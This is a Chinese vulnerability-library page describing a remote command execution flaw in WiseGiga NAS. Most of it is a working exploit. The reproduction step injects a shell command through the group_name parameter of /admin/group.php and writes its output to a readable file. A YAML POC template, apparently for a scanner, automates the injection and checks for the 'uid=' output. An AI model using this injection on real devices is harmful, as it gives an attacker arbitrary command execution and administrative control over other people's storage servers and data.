WiseGiga NAS 远程命令执行-lancc-漏洞文库小世界-安全文库-NGC660安全实验室

WiseGiga NAS 远程命令执行-lancc

0x01 漏洞名称

WiseGiga NAS 远程命令执行

0x02 漏洞描述

WiseGiga NAS是一种专用的数据存储服务器。该系统存在任意命令执行漏洞,攻击者可以通过执行任意命令,获取服务器管理权限

0x03 漏洞复现

(1)访问/admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt

m_a9e1ffa29a17558e7fe8f3c8de7fff57_r
(2)访问/admin/1.txt,文件写入成功
m_224fa2056293d04eee6675f6905af2b3_r

0x04 漏洞POC

params: []
name: WiseGiga NAS 远程命令执行
set: {}
rules:
- method: GET
path: /admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(b"menu02")
- method: GET
path: /admin/1.txt
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(b"uid=")
groups: {}
detail:
author: ""
links: []
description: ""
version: ""

m_e8688ee98677b9eaaf042120194fff90_r

请登录后发表评论

    请登录后查看回复内容